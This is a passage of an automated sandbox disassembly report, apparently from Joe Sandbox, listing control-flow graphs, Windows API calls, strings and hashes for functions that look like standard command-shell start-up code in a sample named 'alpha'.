                                      control_flow_graph 1142 7ff755cb2978-7ff755cb29b6 1143 7ff755cb29b9-7ff755cb29c1 1142->1143 1143->1143 1144 7ff755cb29c3-7ff755cb29c5 1143->1144 1145 7ff755cbe441 1144->1145 1146 7ff755cb29cb-7ff755cb29cf 1144->1146 1147 7ff755cb29d2-7ff755cb29da 1146->1147 1148 7ff755cb2a1e-7ff755cb2a3e FindFirstFileW 1147->1148 1149 7ff755cb29dc-7ff755cb29e1 1147->1149 1151 7ff755cbe435-7ff755cbe439 1148->1151 1152 7ff755cb2a44-7ff755cb2a5c FindClose 1148->1152 1149->1148 1150 7ff755cb29e3-7ff755cb29eb 1149->1150 1150->1147 1153 7ff755cb29ed-7ff755cb2a1c call 7ff755cb8f80 1150->1153 1151->1145 1154 7ff755cb2a62-7ff755cb2a6e 1152->1154 1155 7ff755cb2ae3-7ff755cb2ae5 1152->1155 1157 7ff755cb2a70-7ff755cb2a78 1154->1157 1158 7ff755cbe3f7-7ff755cbe3ff 1155->1158 1159 7ff755cb2aeb-7ff755cb2b10 _wcsnicmp 1155->1159 1157->1157 1162 7ff755cb2a7a-7ff755cb2a8d 1157->1162 1159->1154 1160 7ff755cb2b16-7ff755cbe3f1 _wcsicmp 1159->1160 1160->1154 1160->1158 1162->1145 1164 7ff755cb2a93-7ff755cb2a97 1162->1164 1165 7ff755cbe404-7ff755cbe407 1164->1165 1166 7ff755cb2a9d-7ff755cb2ade memmove call 7ff755cb13e0 1164->1166 1167 7ff755cbe40b-7ff755cbe413 1165->1167 1166->1150 1167->1167 1169 7ff755cbe415-7ff755cbe42b memmove 1167->1169 1169->1151
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                      • Instruction ID: d37bc348147a46ae2b29eba4e16fcb82bf632852541d90978184de6b273c6774
                                      • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                      • Instruction Fuzzy Hash: 185116A7F0868385EA30AB5599442BAE390FB45FB8FCC5230DE6E476D0DF3CE8418610
                                      Function 00007FF755CB4D5C Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 268memorylibraryloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 643 7ff755cb4d5c-7ff755cb4e4b InitializeCriticalSection call 7ff755cb58e4 SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 7ff755cb0580 call 7ff755cb4a14 call 7ff755cb4ad0 call 7ff755cb5554 GetCommandLineW 654 7ff755cb4e4d-7ff755cb4e54 643->654 654->654 655 7ff755cb4e56-7ff755cb4e61 654->655 656 7ff755cb51cf-7ff755cb51e3 call 7ff755ca3278 call 7ff755cb4c1c 655->656 657 7ff755cb4e67-7ff755cb4e7b call 7ff755cb2e44 655->657 662 7ff755cb4e81-7ff755cb4ec3 GetCommandLineW call 7ff755cb13e0 call 7ff755caca40 657->662 663 7ff755cb51ba-7ff755cb51ce call 7ff755ca3278 call 7ff755cb4c1c 657->663 662->663 674 7ff755cb4ec9-7ff755cb4ee8 call 7ff755cb417c call 7ff755cb2394 662->674 663->656 678 7ff755cb4eed-7ff755cb4ef5 674->678 678->678 679 7ff755cb4ef7-7ff755cb4f1f call 7ff755caaa54 678->679 682 7ff755cb4f21-7ff755cb4f30 679->682 683 7ff755cb4f95-7ff755cb4fee GetConsoleOutputCP GetCPInfo call 7ff755cb51ec GetProcessHeap HeapAlloc 679->683 682->683 684 7ff755cb4f32-7ff755cb4f39 682->684 689 7ff755cb5012-7ff755cb5018 683->689 690 7ff755cb4ff0-7ff755cb5006 GetConsoleTitleW 683->690 684->683 686 7ff755cb4f3b-7ff755cb4f77 call 7ff755ca3278 GetWindowsDirectoryW 684->686 695 7ff755cb51b1-7ff755cb51b9 call 7ff755cb4c1c 686->695 696 7ff755cb4f7d-7ff755cb4f90 call 7ff755cb3c24 686->696 693 7ff755cb507a-7ff755cb507e 689->693 694 7ff755cb501a-7ff755cb5024 call 7ff755cb3578 689->694 690->689 692 7ff755cb5008-7ff755cb500f 690->692 692->689 697 7ff755cb5080-7ff755cb50b3 call 7ff755ccb89c call 7ff755ca586c call 7ff755ca3240 call 7ff755cb3448 693->697 698 7ff755cb50eb-7ff755cb5161 GetModuleHandleW GetProcAddress * 3 693->698 694->693 710 7ff755cb5026-7ff755cb5030 694->710 695->663 696->683 724 7ff755cb50d2-7ff755cb50d7 call 7ff755ca3278 697->724 725 7ff755cb50b5-7ff755cb50d0 call 7ff755cb3448 * 2 697->725 702 7ff755cb516f 698->702 703 7ff755cb5163-7ff755cb5167 698->703 709 7ff755cb5172-7ff755cb51af free call 7ff755cb8f80 702->709 703->702 708 7ff755cb5169-7ff755cb516d 703->708 708->702 708->709 711 7ff755cb5032-7ff755cb5059 GetStdHandle GetConsoleScreenBufferInfo 710->711 712 7ff755cb5075 call 7ff755cccff0 710->712 715 7ff755cb5069-7ff755cb5073 711->715 716 7ff755cb505b-7ff755cb5067 711->716 712->693 715->693 715->712 716->693 729 7ff755cb50dc-7ff755cb50e6 GlobalFree 724->729 725->729 729->698
                                      APIs
                                      • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4D9A
                                        • Part of subcall function 00007FF755CB58E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF755CCC6DB), ref: 00007FF755CB58EF
                                      • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4DBB
                                      • _get_osfhandle.MSVCRT ref: 00007FF755CB4DCA
                                      • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4DE0
                                      • _get_osfhandle.MSVCRT ref: 00007FF755CB4DEE
                                      • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4E04
                                        • Part of subcall function 00007FF755CB0580: _get_osfhandle.MSVCRT ref: 00007FF755CB0589
                                        • Part of subcall function 00007FF755CB0580: SetConsoleMode.KERNELBASE ref: 00007FF755CB059E
                                        • Part of subcall function 00007FF755CB0580: _get_osfhandle.MSVCRT ref: 00007FF755CB05AF
                                        • Part of subcall function 00007FF755CB0580: GetConsoleMode.KERNELBASE ref: 00007FF755CB05C5
                                        • Part of subcall function 00007FF755CB0580: _get_osfhandle.MSVCRT ref: 00007FF755CB05EF
                                        • Part of subcall function 00007FF755CB0580: GetConsoleMode.KERNELBASE ref: 00007FF755CB0605
                                        • Part of subcall function 00007FF755CB0580: _get_osfhandle.MSVCRT ref: 00007FF755CB0632
                                        • Part of subcall function 00007FF755CB0580: SetConsoleMode.KERNELBASE ref: 00007FF755CB0647
                                        • Part of subcall function 00007FF755CB4A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A28
                                        • Part of subcall function 00007FF755CB4A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A66
                                        • Part of subcall function 00007FF755CB4A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A7D
                                        • Part of subcall function 00007FF755CB4A14: memmove.MSVCRT(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A9A
                                        • Part of subcall function 00007FF755CB4A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4AA2
                                        • Part of subcall function 00007FF755CB4AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CA8798), ref: 00007FF755CB4AD6
                                        • Part of subcall function 00007FF755CB4AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CA8798), ref: 00007FF755CB4AEF
                                        • Part of subcall function 00007FF755CB5554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF755CB4E35), ref: 00007FF755CB55DA
                                        • Part of subcall function 00007FF755CB5554: RegQueryValueExW.KERNELBASE ref: 00007FF755CB5623
                                        • Part of subcall function 00007FF755CB5554: RegQueryValueExW.KERNELBASE ref: 00007FF755CB5667
                                        • Part of subcall function 00007FF755CB5554: RegQueryValueExW.KERNELBASE ref: 00007FF755CB56BE
                                        • Part of subcall function 00007FF755CB5554: RegQueryValueExW.KERNELBASE ref: 00007FF755CB5702
                                      • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4E35
                                      • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4E81
                                      • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4F69
                                      • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4F95
                                      • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4FB0
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4FC1
                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4FD8
                                      • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4FF8
                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB5037
                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB504B
                                      • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB50DF
                                      • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB50F2
                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB510F
                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB5130
                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB514A
                                      • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB5175
                                        • Part of subcall function 00007FF755CB3578: _get_osfhandle.MSVCRT ref: 00007FF755CB3584
                                        • Part of subcall function 00007FF755CB3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB359C
                                        • Part of subcall function 00007FF755CB3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35C3
                                        • Part of subcall function 00007FF755CB3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35D9
                                        • Part of subcall function 00007FF755CB3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35ED
                                        • Part of subcall function 00007FF755CB3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB3602
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                      • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                      • API String ID: 1049357271-3021193919
                                      • Opcode ID: fa8d2def7bb0d79b836b7894b6796c7ff966ef088737a8baff12253f96499c8d
                                      • Instruction ID: 34fd07a89923f737413449967e35eeeeec52b77dd5d007abf6ac500ea12b64b1
                                      • Opcode Fuzzy Hash: fa8d2def7bb0d79b836b7894b6796c7ff966ef088737a8baff12253f96499c8d
                                      • Instruction Fuzzy Hash: 1CC152FBA08A8386EA40BB11E854179F7A1FF85F99FCC4135D90E47791EF3CA8458260
                                      Function 00007FF755CB3C24 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 289COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 732 7ff755cb3c24-7ff755cb3c61 733 7ff755cbec5a-7ff755cbec5f 732->733 734 7ff755cb3c67-7ff755cb3c99 call 7ff755caaf14 call 7ff755caca40 732->734 733->734 736 7ff755cbec65-7ff755cbec6a 733->736 743 7ff755cb3c9f-7ff755cb3cb2 call 7ff755cab900 734->743 744 7ff755cbec97-7ff755cbeca1 call 7ff755cb855c 734->744 738 7ff755cb412e-7ff755cb415b call 7ff755cb8f80 736->738 743->744 749 7ff755cb3cb8-7ff755cb3cbc 743->749 750 7ff755cb3cbf-7ff755cb3cc7 749->750 750->750 751 7ff755cb3cc9-7ff755cb3ccd 750->751 752 7ff755cb3cd2-7ff755cb3cd8 751->752 753 7ff755cb3ce5-7ff755cb3d62 GetCurrentDirectoryW towupper iswalpha 752->753 754 7ff755cb3cda-7ff755cb3cdf 752->754 756 7ff755cb3fb8 753->756 757 7ff755cb3d68-7ff755cb3d6c 753->757 754->753 755 7ff755cb3faa-7ff755cb3fb3 754->755 755->752 759 7ff755cb3fc6-7ff755cb3fec GetLastError call 7ff755cb855c call 7ff755cba5d6 756->759 757->756 758 7ff755cb3d72-7ff755cb3dcd towupper GetFullPathNameW 757->758 758->759 760 7ff755cb3dd3-7ff755cb3ddd 758->760 762 7ff755cb3ff1-7ff755cb4007 call 7ff755cb855c _local_unwind 759->762 760->762 763 7ff755cb3de3-7ff755cb3dfb 760->763 772 7ff755cb400c-7ff755cb4022 GetLastError 762->772 765 7ff755cb3e01-7ff755cb3e11 763->765 766 7ff755cb40fe-7ff755cb4119 call 7ff755cb855c _local_unwind 763->766 765->766 770 7ff755cb3e17-7ff755cb3e28 765->770 778 7ff755cb411a-7ff755cb412c call 7ff755caff70 call 7ff755cb855c 766->778 774 7ff755cb3e2c-7ff755cb3e34 770->774 776 7ff755cb3e95-7ff755cb3e9c 772->776 777 7ff755cb4028-7ff755cb402b 772->777 774->774 775 7ff755cb3e36-7ff755cb3e3f 774->775 779 7ff755cb3e42-7ff755cb3e55 775->779 781 7ff755cb3ecf-7ff755cb3ed3 776->781 782 7ff755cb3e9e-7ff755cb3ec2 call 7ff755cb2978 776->782 777->776 780 7ff755cb4031-7ff755cb4047 call 7ff755cb855c _local_unwind 777->780 778->738 784 7ff755cb3e66-7ff755cb3e8f GetFileAttributesW 779->784 785 7ff755cb3e57-7ff755cb3e60 779->785 799 7ff755cb404c-7ff755cb4062 call 7ff755cb855c _local_unwind 780->799 788 7ff755cb3ed5-7ff755cb3ef7 GetFileAttributesW 781->788 789 7ff755cb3f08-7ff755cb3f0b 781->789 793 7ff755cb3ec7-7ff755cb3ec9 782->793 784->772 784->776 785->784 791 7ff755cb3f9d-7ff755cb3fa5 785->791 794 7ff755cb4067-7ff755cb4098 GetLastError call 7ff755cb855c _local_unwind 788->794 795 7ff755cb3efd-7ff755cb3f02 788->795 797 7ff755cb3f0d-7ff755cb3f11 789->797 798 7ff755cb3f1e-7ff755cb3f40 SetCurrentDirectoryW 789->798 791->779 793->781 793->799 801 7ff755cb409d-7ff755cb40b3 call 7ff755cb855c _local_unwind 794->801 795->789 795->801 803 7ff755cb3f46-7ff755cb3f69 call 7ff755cb498c 797->803 804 7ff755cb3f13-7ff755cb3f1c 797->804 798->803 805 7ff755cb40b8-7ff755cb40de GetLastError call 7ff755cb855c _local_unwind 798->805 799->794 801->805 815 7ff755cb40e3-7ff755cb40f9 call 7ff755cb855c _local_unwind 803->815 816 7ff755cb3f6f-7ff755cb3f98 call 7ff755cb417c 803->816 804->798 804->803 805->815 815->766 816->778
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                      • String ID: :
                                      • API String ID: 1809961153-336475711
                                      • Opcode ID: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
                                      • Instruction ID: fa62394016a20937b2aca496992eb8b8f9b151329572276e60d126a9a8bc4680
                                      • Opcode Fuzzy Hash: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
                                      • Instruction Fuzzy Hash: B9D16FABA0CB8691EA60EB15E4542B9F7A1FB84F58FC84135D98E437A4DF3CE944C710
                                      Function 00007FF755CB2394 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 213COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 914 7ff755cb2394-7ff755cb2416 memset call 7ff755caca40 917 7ff755cbe0d2-7ff755cbe0da call 7ff755cb4c1c 914->917 918 7ff755cb241c-7ff755cb2453 GetModuleFileNameW call 7ff755cb081c 914->918 923 7ff755cbe0db-7ff755cbe0ee call 7ff755cb498c 917->923 918->923 924 7ff755cb2459-7ff755cb2468 call 7ff755cb081c 918->924 929 7ff755cbe0f4-7ff755cbe107 call 7ff755cb498c 923->929 924->929 930 7ff755cb246e-7ff755cb247d call 7ff755cb081c 924->930 939 7ff755cbe10d-7ff755cbe123 929->939 935 7ff755cb2516-7ff755cb2529 call 7ff755cb498c 930->935 936 7ff755cb2483-7ff755cb2492 call 7ff755cb081c 930->936 935->936 936->939 947 7ff755cb2498-7ff755cb24a7 call 7ff755cb081c 936->947 942 7ff755cbe13f-7ff755cbe17a _wcsupr 939->942 943 7ff755cbe125-7ff755cbe139 wcschr 939->943 945 7ff755cbe181-7ff755cbe199 wcsrchr 942->945 946 7ff755cbe17c-7ff755cbe17f 942->946 943->942 944 7ff755cbe27c 943->944 949 7ff755cbe283-7ff755cbe29b call 7ff755cb498c 944->949 948 7ff755cbe19c 945->948 946->948 956 7ff755cbe2a1-7ff755cbe2c3 _wcsicmp 947->956 957 7ff755cb24ad-7ff755cb24c5 call 7ff755cb3c24 947->957 951 7ff755cbe1a0-7ff755cbe1a7 948->951 949->956 951->951 954 7ff755cbe1a9-7ff755cbe1bb 951->954 958 7ff755cbe1c1-7ff755cbe1e6 954->958 959 7ff755cbe264-7ff755cbe277 call 7ff755cb1300 954->959 964 7ff755cb24ca-7ff755cb24db 957->964 962 7ff755cbe21a 958->962 963 7ff755cbe1e8-7ff755cbe1f1 958->963 959->944 969 7ff755cbe21d-7ff755cbe21f 962->969 965 7ff755cbe201-7ff755cbe210 963->965 966 7ff755cbe1f3-7ff755cbe1f6 963->966 967 7ff755cb24e9-7ff755cb2514 call 7ff755cb8f80 964->967 968 7ff755cb24dd-7ff755cb24e4 ??_V@YAXPEAX@Z 964->968 965->962 971 7ff755cbe212-7ff755cbe218 965->971 966->965 970 7ff755cbe1f8-7ff755cbe1ff 966->970 968->967 969->949 973 7ff755cbe221-7ff755cbe228 969->973 970->965 970->966 971->969 975 7ff755cbe254-7ff755cbe262 973->975 976 7ff755cbe22a-7ff755cbe231 973->976 975->944 977 7ff755cbe234-7ff755cbe237 976->977 977->975 978 7ff755cbe239-7ff755cbe242 977->978 978->975 979 7ff755cbe244-7ff755cbe252 978->979 979->975 979->977
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                      • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                      • API String ID: 2622545777-4197029667
                                      • Opcode ID: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
                                      • Instruction ID: 1cdace2bd3fe6f00d5ef111cbce25f000504adc8c12956f338fceb3a4db3fe2b
                                      • Opcode Fuzzy Hash: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
                                      • Instruction Fuzzy Hash: 359172BBB09A8785EE64AB50D8502B8A3A5FF49F98FC84135C94E47695DF3CE905C320
                                      Function 00007FF755CB0580 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 82COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: ConsoleMode_get_osfhandle
                                      • String ID: CMD.EXE
                                      • API String ID: 1606018815-3025314500
                                      • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                      • Instruction ID: 8baecc15e49cd004b83f18b21d64bf2d2e5a56cc4aa177d0c769905f067ba7ba
                                      • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                      • Instruction Fuzzy Hash: ED41F3BAA09683CBE7456B15E845178FBA1FF89F59FCC4139C90E87360DF3CA4148660
                                      Function 00007FF755CAC620 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 312COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 992 7ff755cac620-7ff755cac66f GetConsoleTitleW 993 7ff755cbc5f2 992->993 994 7ff755cac675-7ff755cac687 call 7ff755caaf14 992->994 996 7ff755cbc5fc-7ff755cbc60c GetLastError 993->996 998 7ff755cac689 994->998 999 7ff755cac68e-7ff755cac69d call 7ff755caca40 994->999 1000 7ff755cbc5e3 call 7ff755ca3278 996->1000 998->999 1004 7ff755cbc5e8-7ff755cbc5ed call 7ff755cb855c 999->1004 1005 7ff755cac6a3-7ff755cac6ac 999->1005 1000->1004 1004->993 1007 7ff755cac6b2-7ff755cac6c5 call 7ff755cab9c0 1005->1007 1008 7ff755cac954-7ff755cac95e call 7ff755cb291c 1005->1008 1015 7ff755cac9b5-7ff755cac9b8 call 7ff755cb5c6c 1007->1015 1016 7ff755cac6cb-7ff755cac6ce 1007->1016 1013 7ff755cac964-7ff755cac96b call 7ff755ca89c0 1008->1013 1014 7ff755cbc5de-7ff755cbc5e0 1008->1014 1020 7ff755cac970-7ff755cac972 1013->1020 1014->1000 1023 7ff755cac9bd-7ff755cac9c9 call 7ff755cb855c 1015->1023 1016->1004 1018 7ff755cac6d4-7ff755cac6e9 1016->1018 1021 7ff755cac6ef-7ff755cac6fa 1018->1021 1022 7ff755cbc616-7ff755cbc620 call 7ff755cb855c 1018->1022 1020->996 1024 7ff755cac978-7ff755cac99a towupper 1020->1024 1025 7ff755cac700-7ff755cac713 1021->1025 1026 7ff755cbc627 